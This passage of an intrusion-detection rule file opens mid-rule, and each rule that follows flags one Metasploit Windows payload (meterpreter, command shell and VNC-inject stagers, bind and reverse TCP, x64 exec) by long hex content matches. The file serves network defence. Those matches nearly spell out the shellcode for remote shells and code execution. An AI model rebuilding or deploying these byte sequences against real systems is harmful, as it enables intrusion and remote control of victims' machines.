d0 97 68 |"; content:"| 68 02 00 00 |"; content:"| 89 e1 53 b7 0c 53 51 57 51 6a 10 51 57 56 ff e5 |"; sid:1000195; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/vncinject/reverse_tcp"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 6a 05 68 |"; content:"| 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 99 a5 74 61 ff d5 85 c0 74 0c ff 4e 08 75 ec 68 f0 b5 a2 56 ff d5 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000196; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/vncinject/reverse_tcp_allports"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 68 |"; content:"| 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 99 a5 74 61 ff d5 85 c0 74 12 31 c0 66 8b 46 02 86 e0 66 40 86 e0 66 89 46 02 eb df 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000197; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/vncinject/reverse_tcp_dns"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 eb 2f 68 a9 28 34 80 ff d5 8b 40 1c 6a 05 50 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 99 a5 74 61 ff d5 85 c0 74 51 ff 4e 08 75 ec 68 f0 b5 a2 56 ff d5 e8 cc ff ff ff |"; content:"| 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 |"; content:"| 00 56 6a 00 68 |"; content:"| a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000198; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/x64/exec"; flow:established; content:"| fc 48 83 e4 f0 e8 c0 00 00 00 41 51 41 50 52 51 56 48 31 d2 65 48 8b 52 60 48 8b 52 18 48 8b 52 20 48 8b 72 50 48 0f b7 4a 4a 4d 31 c9 48 31 c0 ac 3c 61 7c 02 2c 20 41 c1 c9 0d 41 01 c1 e2 ed 52 41 51 48 8b 52 20 8b 42 3c 48 01 d0 8b 80 88 00 00 00 48 85 c0 74 67 48 01 d0 50 8b 48 18 44 8b 40 20 49 01 d0 e3 56 48 ff c9 41 8b 34 88 48 01 d6 4d 31 c9 48 31 c0 ac 41 c1 c9 0d 41 01 c1 38 e0 75 f1 4c 03 4c 24 08 45 39 d1 75 d8 58 44 8b 40 24 49 01 d0 66 41 8b 0c 48 44 8b 40 1c 49 01 d0 41 8b 04 88 48 01 d0 41 58 41 58 5e 59 5a 41 58 41 59 41 5a 48 83 ec 20 41 52 ff e0 58 41 59 5a 48 8b 12 e9 57 ff ff ff 5d 48 ba 01 00 00 00 00 00 00 00 48 8d 8d 01 01 00 00 41 ba 31 8b 6f 87 ff d5 bb f0 b5 a2 56 41 ba a6 95 bd 9d ff d5 48 83 c4 28 3c 06 7c 0a 80 fb e0 75 05 bb 47 13 72 6f 6a 00 59 41 89 da ff d5 |"; content:"| 74 68 69 6e 67 |"; sid:1000199; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/x64/meterpreter/bind_tcp"; flow:established; content:"| fc 48 83 e4 f0 e8 c0 00 00 00 41 51 41 50 52 51 56 48 31 d2 65 48 8b 52 60 48 8b 52 18 48 8b 52 20 48 8b 72 50 48 0f b7 4a 4a 4d 31 c9 48 31 c0 ac 3c 61 7c 02 2c 20 41 c1 c9 0d 41 01 c1 e2 ed 52 41 51 48 8b 52 20 8b 42 3c 48 01 d0 8b 80 88 00 00 00 48 85 c0 74 67 48 01 d0 50 8b 48 18 44 8b 40 20 49 01 d0 e3 56 48 ff c9 41 8b 34 88 48 01 d6 4d 31 c9 48 31 c0 ac 41 c1 c9 0d 41 01 c1 38 e0 75 f1 4c 03 4c 24 08 45 39 d1 75 d8 58 44 8b 40 24 49 01 d0 66 41 8b 0c 48 44 8b 40 1c 49 01 d0 41 8b 04 88 48 01 d0 41 58 41 58 5e 59 5a 41 58 41 59 41 5a 48 83 ec 20 41 52 ff e0 58 41 59 5a 48 8b 12 e9 57 ff ff ff 5d 49 be 77 73 32 5f 33 32 00 00 41 56 49 89 e6 48 81 ec a0 01 00 00 49 89 e5 49 bc 02 00 00 |"; content:"| 00 00 00 00 41 54 49 89 e4 4c 89 f1 41 ba 4c 77 26 07 ff d5 4c 89 ea 68 01 01 00 00 59 41 ba 29 80 6b 00 ff d5 50 50 4d 31 c9 4d 31 c0 48 ff c0 48 89 c2 48 ff c0 48 89 c1 41 ba ea 0f df e0 ff d5 48 89 c7 6a 10 41 58 4c 89 e2 48 89 f9 41 ba c2 db 37 67 ff d5 48 31 d2 48 89 f9 41 ba b7 e9 38 ff ff |"; content:"| d5 4d 31 c0 48 31 d2 48 89 f9 41 ba 74 ec 3b e1 ff d5 48 89 f9 48 89 c7 41 ba 75 6e 4d 61 ff d5 48 81 c4 a0 02 00 00 48 83 ec 10 48 89 e2 4d 31 c9 6a 04 41 58 48 89 f9 41 ba 02 d9 c8 5f ff d5 48 83 c4 20 5e 6a 40 41 59 68 00 10 00 00 41 58 48 89 f2 48 31 c9 41 ba 58 a4 53 e5 ff d5 48 89 c3 49 89 c7 4d 31 c9 49 89 f0 48 89 da 48 89 f9 41 ba 02 d9 c8 5f ff d5 48 01 c3 48 29 c6 48 85 f6 75 e1 41 ff e7 |"; sid:1000200; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/x64/meterpreter/reverse_tcp"; flow:established; content:"| fc 48 83 e4 f0 e8 c0 00 00 00 41 51 41 50 52 51 56 48 31 d2 65 48 8b 52 60 48 8b 52 18 48 8b 52 20 48 8b 72 50 48 0f b7 4a 4a 4d 31 c9 48 31 c0 ac 3c 61 7c 02 2c 20 41 c1 c9 0d 41 01 c1 e2 ed 52 41 51 48 8b 52 20 8b 42 3c 48 01 d0 8b 80 88 00 00 00 48 85 c0 74 67 48 01 d0 50 8b 48 18 44 8b 40 20 49 01 d0 e3 56 48 ff c9 41 8b 34 88 48 01 d6 4d 31 c9 48 31 c0 ac 41 c1 c9 0d 41 01 c1 38 e0 75 f1 4c 03 4c 24 08 45 39 d1 75 d8 58 44 8b 40 24 49 01 d0 66 41 8b 0c 48 44 8b 40 1c 49 01 d0 41 8b 04 88 48 01 d0 41 58 41 58 5e 59 5a 41 58 41 59 41 5a 48 83 ec 20 41 52 ff e0 58 41 59 5a 48 8b 12 e9 57 ff ff ff 5d 49 be 77 73 32 5f 33 32 00 00 41 56 49 89 e6 48 81 ec a0 01 00 00 49 89 e5 49 bc 02 00 00 |"; content:"| 41 54 49 89 e4 4c 89 f1 41 ba 4c 77 26 07 ff d5 4c 89 ea 68 01 01 00 00 59 41 ba 29 80 6b 00 ff d5 50 50 4d 31 c9 4d 31 c0 48 ff c0 48 89 c2 48 ff c0 48 89 c1 41 ba ea 0f df e0 ff d5 48 89 c7 6a 10 41 58 4c 89 e2 48 89 f9 41 ba 99 a5 74 61 ff d5 48 81 c4 40 02 00 00 48 83 ec 10 48 89 |"; content:"| 6a 04 41 58 48 89 f9 41 ba 02 d9 c8 5f ff d5 48 83 c4 20 5e 6a 40 41 59 68 00 10 00 00 41 58 48 89 f2 48 31 c9 41 ba 58 a4 53 e5 ff d5 48 89 c3 49 89 c7 4d 31 c9 49 89 f0 48 89 da 48 89 f9 41 ba 02 d9 c8 5f ff d5 48 01 c3 48 29 c6 48 85 f6 75 e1 41 ff e7 |"; sid:1000201; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/x64/shell/bind_tcp"; flow:established; content:"| fc 48 83 e4 f0 e8 c0 00 00 00 41 51 41 50 52 51 56 48 31 d2 65 48 8b 52 60 48 8b 52 18 48 8b 52 20 48 8b 72 50 48 0f b7 4a 4a 4d 31 c9 48 31 c0 ac 3c 61 7c 02 2c 20 41 c1 c9 0d 41 01 c1 e2 ed 52 41 51 48 8b 52 20 8b 42 3c 48 01 d0 8b 80 88 00 00 00 48 85 c0 74 67 48 01 d0 50 8b 48 18 44 8b 40 20 49 01 d0 e3 56 48 ff c9 41 8b 34 88 48 01 d6 4d 31 c9 48 31 c0 ac 41 c1 c9 0d 41 01 c1 38 e0 75 f1 4c 03 4c 24 08 45 39 d1 75 d8 58 44 8b 40 24 49 01 d0 66 41 8b 0c 48 44 8b 40 1c 49 01 d0 41 8b 04 88 48 01 d0 41 58 41 58 5e 59 5a 41 58 41 59 41 5a 48 83 ec 20 41 52 ff e0 58 41 59 5a 48 8b 12 e9 57 ff ff ff 5d 49 be 77 73 32 5f 33 32 00 00 41 56 49 89 e6 48 81 ec a0 01 00 00 49 89 e5 49 bc 02 00 00 |"; content:"| 00 00 00 00 41 54 49 89 e4 4c 89 f1 41 ba 4c 77 26 07 ff d5 4c 89 ea 68 01 01 00 00 59 41 ba 29 80 6b 00 ff d5 50 50 4d 31 c9 4d 31 c0 48 ff c0 48 89 c2 48 ff c0 48 89 c1 41 ba ea 0f df e0 ff d5 48 89 c7 6a 10 41 58 4c 89 e2 48 89 f9 41 ba c2 db 37 67 ff d5 48 31 d2 48 89 f9 41 ba b7 e9 38 ff ff |"; content:"| d5 4d 31 c0 48 31 d2 48 89 f9 41 ba 74 ec 3b e1 ff d5 48 89 f9 48 89 c7 41 ba 75 6e 4d 61 ff d5 48 81 c4 a0 02 00 00 48 83 ec 10 48 89 e2 4d 31 c9 6a 04 41 58 48 89 f9 41 ba 02 d9 c8 5f ff d5 48 83 c4 20 5e 6a 40 41 59 68 00 10 00 00 41 58 48 89 f2 48 31 c9 41 ba 58 a4 53 e5 ff d5 48 89 c3 49 89 c7 4d 31 c9 49 89 f0 48 89 da 48 89 f9 41 ba 02 d9 c8 5f ff d5 48 01 c3 48 29 c6 48 85 f6 75 e1 41 ff e7 |"; sid:1000202; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/x64/shell/reverse_tcp"; flow:established; content:"| fc 48 83 e4 f0 e8 c0 00 00 00 41 51 41 50 52 51 56 48 31 d2 65 48 8b 52 60 48 8b 52 18 48 8b 52 20 48 8b 72 50 48 0f b7 4a 4a 4d 31 c9 48 31 c0 ac 3c 61 7c 02 2c 20 41 c1 c9 0d 41 01 c1 e2 ed 52 41 51 48 8b 52 20 8b 42 3c 48 01 d0 8b 80 88 00 00 00 48 85 c0 74 67 48 01 d0 50 8b 48 18 44 8b 40 20 49 01 d0 e3 56 48 ff c9 41 8b 34 88 48 01 d6 4d 31 c9 48 31 c0 ac 41 c1 c9 0d 41 01 c1 38 e0 75 f1 4c 03 4c 24 08 45 39 d1 75 d8 58 44 8b 40 24 49 01 d0 66 41 8b 0c 48 44 8b 40 1c 49 01 d0 41 8b 04 88 48 01 d0 41 58 41 58 5e 59 5a 41 58 41 59 41 5a 48 83 ec 20 41 52 ff e0 58 41 59 5a 48 8b 12 e9 57 ff ff ff 5d 49 be 77 73 32 5f 33 32 00 00 41 56 49 89 e6 48 81 ec a0 01 00 00 49 89 e5 49 bc 02 00 00 |"; content:"| 41 54 49 89 e4 4c 89 f1 41 ba 4c 77 26 07 ff d5 4c 89 ea 68 01 01 00 00 59 41 ba 29 80 6b 00 ff d5 50 50 4d 31 c9 4d 31 c0 48 ff c0 48 89 c2 48 ff c0 48 89 c1 41 ba ea 0f df e0 ff d5 48 89 c7 6a 10 41 58 4c 89 e2 48 89 f9 41 ba 99 a5 74 61 ff d5 48 81 c4 40 02 00 00 48 83 ec 10 48 89 |"; content:"| 6a 04 41 58 48 89 f9 41 ba 02 d9 c8 5f ff d5 48 83 c4 20 5e 6a 40 41 59 68 00 10 00 00 41 58 48 89 f2 48 31 c9 41 ba 58 a4 53 e5 ff d5 48 89 c3 49 89 c7 4d 31 c9 49 89 f0 48 89 da 48 89 f9 41 ba 02 d9 c8 5f ff d5 48 01 c3 48 29 c6 48 85 f6 75 e1 41 ff e7 |"; sid:1000203; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/x64/shell_bind_tcp"; flow:established; content:"| fc 48 83 e4 f0 e8 c0 00 00 00 41 51 41 50 52 51 56 48 31 d2 65 48 8b 52 60 48 8b 52 18 48 8b 52 20 48 8b 72 50 48 0f b7 4a 4a 4d 31 c9 48 31 c0 ac 3c 61 7c 02 2c 20 41 c1 c9 0d 41 01 c1 e2 ed 52 41 51 48 8b 52 20 8b 42 3c 48 01 d0 8b 80 88 00 00 00 48 85 c0 74 67 48 01 d0 50 8b 48 18 44 8b 40 20 49 01 d0 e3 56 48 ff c9 41 8b 34 88 48 01 d6 4d 31 c9 48 31 c0 ac 41 c1 c9 0d 41 01 c1 38 e0 75 f1 4c 03 4c 24 08 45 39 d1 75 d8 58 44 8b 40 24 49 01 d0 66 41 8b 0c 48 44 8b 40 1c 49 01 d0 41 8b 04 88 48 01 d0 41 58 41 58 5e 59 5a 41 58 41 59 41 5a 48 83 ec 20 41 52 ff e0 58 41 59 5a 48 8b 12 e9 57 ff ff ff 5d 49 be 77 73 32 5f 33 32 00 00 41 56 49 89 e6 48 81 ec a0 01 00 00 49 89 e5 49 bc 02 00 00 |"; content:"| 00 00 00 00 41 54 49 89 e4 4c 89 f1 41 ba 4c 77 26 07 ff d5 4c 89 ea 68 01 01 00 00 59 41 ba 29 80 6b 00 ff d5 50 50 4d 31 c9 4d 31 c0 48 ff c0 48 89 c2 48 ff c0 48 89 c1 41 ba ea 0f df e0 ff d5 48 89 c7 6a 10 41 58 4c 89 e2 48 89 f9 41 ba c2 db 37 67 ff d5 48 31 d2 48 89 f9 41 ba b7 e9 38 ff ff |"; content:"| d5 4d 31 c0 48 31 d2 48 89 f9 41 ba 74 ec 3b e1 ff d5 48 89 f9 48 89 c7 41 ba 75 6e 4d 61 ff d5 48 81 c4 a0 02 00 00 49 b8 63 6d 64 00 00 00 00 00 41 50 41 50 48 89 e2 57 57 57 4d 31 c0 6a 0d 59 41 50 e2 fc 66 c7 44 24 54 01 01 48 8d 44 24 18 c6 00 68 48 89 e6 56 50 41 50 41 50 41 50 49 ff c0 41 50 49 ff c8 4d 89 c1 4c 89 c1 41 ba 79 cc 3f 86 ff d5 48 31 d2 48 ff ca 8b 0e 41 ba 08 87 1d 60 ff d5 bb f0 b5 a2 56 41 ba a6 95 bd 9d ff d5 48 83 c4 28 3c 06 7c 0a 80 fb e0 75 05 bb 47 13 72 6f 6a 00 59 41 89 da ff d5 |"; sid:1000204; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/x64/shell_reverse_tcp"; flow:established; content:"| fc 48 83 e4 f0 e8 c0 00 00 00 41 51 41 50 52 51 56 48 31 d2 65 48 8b 52 60 48 8b 52 18 48 8b 52 20 48 8b 72 50 48 0f b7 4a 4a 4d 31 c9 48 31 c0 ac 3c 61 7c 02 2c 20 41 c1 c9 0d 41 01 c1 e2 ed 52 41 51 48 8b 52 20 8b 42 3c 48 01 d0 8b 80 88 00 00 00 48 85 c0 74 67 48 01 d0 50 8b 48 18 44 8b 40 20 49 01 d0 e3 56 48 ff c9 41 8b 34 88 48 01 d6 4d 31 c9 48 31 c0 ac 41 c1 c9 0d 41 01 c1 38 e0 75 f1 4c 03 4c 24 08 45 39 d1 75 d8 58 44 8b 40 24 49 01 d0 66 41 8b 0c 48 44 8b 40 1c 49 01 d0 41 8b 04 88 48 01 d0 41 58 41 58 5e 59 5a 41 58 41 59 41 5a 48 83 ec 20 41 52 ff e0 58 41 59 5a 48 8b 12 e9 57 ff ff ff 5d 49 be 77 73 32 5f 33 32 00 00 41 56 49 89 e6 48 81 ec a0 01 00 00 49 89 e5 49 bc 02 00 00 |"; content:"| 41 54 49 89 e4 4c 89 f1 41 ba 4c 77 26 07 ff d5 4c 89 ea 68 01 01 00 00 59 41 ba 29 80 6b 00 ff d5 50 50 4d 31 c9 4d 31 c0 48 ff c0 48 89 c2 48 ff c0 48 89 c1 41 ba ea 0f df e0 ff d5 48 89 c7 6a 10 41 58 4c 89 e2 48 89 f9 41 ba 99 a5 74 61 ff d5 48 81 c4 40 02 00 00 49 b8 63 6d 64 00 |"; content:"| 41 50 41 50 48 89 e2 57 57 57 4d 31 c0 6a 0d 59 41 50 e2 fc 66 c7 44 24 54 01 01 48 8d 44 24 18 c6 00 68 48 89 e6 56 50 41 50 41 50 41 50 49 ff c0 41 50 49 ff c8 4d 89 c1 4c 89 c1 41 ba 79 cc 3f 86 ff d5 48 31 d2 48 ff ca 8b 0e 41 ba 08 87 1d 60 ff d5 bb f0 b5 a2 56 41 ba a6 95 bd 9d ff d5 48 83 c4 28 3c 06 7c 0a 80 fb e0 75 05 bb 47 13 72 6f 6a 00 59 41 89 da ff d5 |"; sid:1000205; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/x64/vncinject/bind_tcp"; flow:established; content:"| fc 48 83 e4 f0 e8 c0 00 00 00 41 51 41 50 52 51 56 48 31 d2 65 48 8b 52 60 48 8b 52 18 48 8b 52 20 48 8b 72 50 48 0f b7 4a 4a 4d 31 c9 48 31 c0 ac 3c 61 7c 02 2c 20 41 c1 c9 0d 41 01 c1 e2 ed 52 41 51 48 8b 52 20 8b 42 3c 48 01 d0 8b 80 88 00 00 00 48 85 c0 74 67 48 01 d0 50 8b 48 18 44 8b 40 20 49 01 d0 e3 56 48 ff c9 41 8b 34 88 48 01 d6 4d 31 c9 48 31 c0 ac 41 c1 c9 0d 41 01 c1 38 e0 75 f1 4c 03 4c 24 08 45 39 d1 75 d8 58 44 8b 40 24 49 01 d0 66 41 8b 0c 48 44 8b 40 1c 49 01 d0 41 8b 04 88 48 01 d0 41 58 41 58 5e 59 5a 41 58 41 59 41 5a 48 83 ec 20 41 52 ff e0 58 41 59 5a 48 8b 12 e9 57 ff ff ff 5d 49 be 77 73 32 5f 33 32 00 00 41 56 49 89 e6 48 81 ec a0 01 00 00 49 89 e5 49 bc 02 00 00 |"; content:"| 00 00 00 00 41 54 49 89 e4 4c 89 f1 41 ba 4c 77 26 07 ff d5 4c 89 ea 68 01 01 00 00 59 41 ba 29 80 6b 00 ff d5 50 50 4d 31 c9 4d 31 c0 48 ff c0 48 89 c2 48 ff c0 48 89 c1 41 ba ea 0f df e0 ff d5 48 89 c7 6a 10 41 58 4c 89 e2 48 89 f9 41 ba c2 db 37 67 ff d5 48 31 d2 48 89 f9 41 ba b7 e9 38 ff ff |"; content:"| d5 4d 31 c0 48 31 d2 48 89 f9 41 ba 74 ec 3b e1 ff d5 48 89 f9 48 89 c7 41 ba 75 6e 4d 61 ff d5 48 81 c4 a0 02 00 00 48 83 ec 10 48 89 e2 4d 31 c9 6a 04 41 58 48 89 f9 41 ba 02 d9 c8 5f ff d5 48 83 c4 20 5e 6a 40 41 59 68 00 10 00 00 41 58 48 89 f2 48 31 c9 41 ba 58 a4 53 e5 ff d5 48 89 c3 49 89 c7 4d 31 c9 49 89 f0 48 89 da 48 89 f9 41 ba 02 d9 c8 5f ff d5 48 01 c3 48 29 c6 48 85 f6 75 e1 41 ff e7 |"; sid:1000206; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/x64/vncinject/reverse_tcp"; flow:established; content:"| fc 48 83 e4 f0 e8 c0 00 00 00 41 51 41 50 52 51 56 48 31 d2 65 48 8b 52 60 48 8b 52 18 48 8b 52 20 48 8b 72 50 48 0f b7 4a 4a 4d 31 c9 48 31 c0 ac 3c 61 7c 02 2c 20 41 c1 c9 0d 41 01 c1 e2 ed 52 41 51 48 8b 52 20 8b 42 3c 48 01 d0 8b 80 88 00 00 00 48 85 c0 74 67 48 01 d0 50 8b 48 18 44 8b 40 20 49 01 d0 e3 56 48 ff c9 41 8b 34 88 48 01 d6 4d 31 c9 48 31 c0 ac 41 c1 c9 0d 41 01 c1 38 e0 75 f1 4c 03 4c 24 08 45 39 d1 75 d8 58 44 8b 40 24 49 01 d0 66 41 8b 0c 48 44 8b 40 1c 49 01 d0 41 8b 04 88 48 01 d0 41 58 41 58 5e 59 5a 41 58 41 59 41 5a 48 83 ec 20 41 52 ff e0 58 41 59 5a 48 8b 12 e9 57 ff ff ff 5d 49 be 77 73 32 5f 33 32 00 00 41 56 49 89 e6 48 81 ec a0 01 00 00 49 89 e5 49 bc 02 00 00 |"; content:"| 41 54 49 89 e4 4c 89 f1 41 ba 4c 77 26 07 ff d5 4c 89 ea 68 01 01 00 00 59 41 ba 29 80 6b 00 ff d5 50 50 4d 31 c9 4d 31 c0 48 ff c0 48 89 c2 48 ff c0 48 89 c1 41 ba ea 0f df e0 ff d5 48 89 c7 6a 10 41 58 4c 89 e2 48 89 f9 41 ba 99 a5 74 61 ff d5 48 81 c4 40 02 00 00 48 83 ec 10 48 89 |"; content:"| 6a 04 41 58 48 89 f9 41 ba 02 d9 c8 5f ff d5 48 83 c4 20 5e 6a 40 41 59 68 00 10 00 00 41 58 48 89 f2 48 31 c9 41 ba 58 a4 53 e5 ff d5 48 89 c3 49 89 c7 4d 31 c9 49 89 f0 48 89 da 48 89 f9 41 ba 02 d9 c8 5f ff d5 48 01 c3 48 29 c6 48 85 f6 75 e1 41 ff e7 |"; sid:1000207; rev:1;)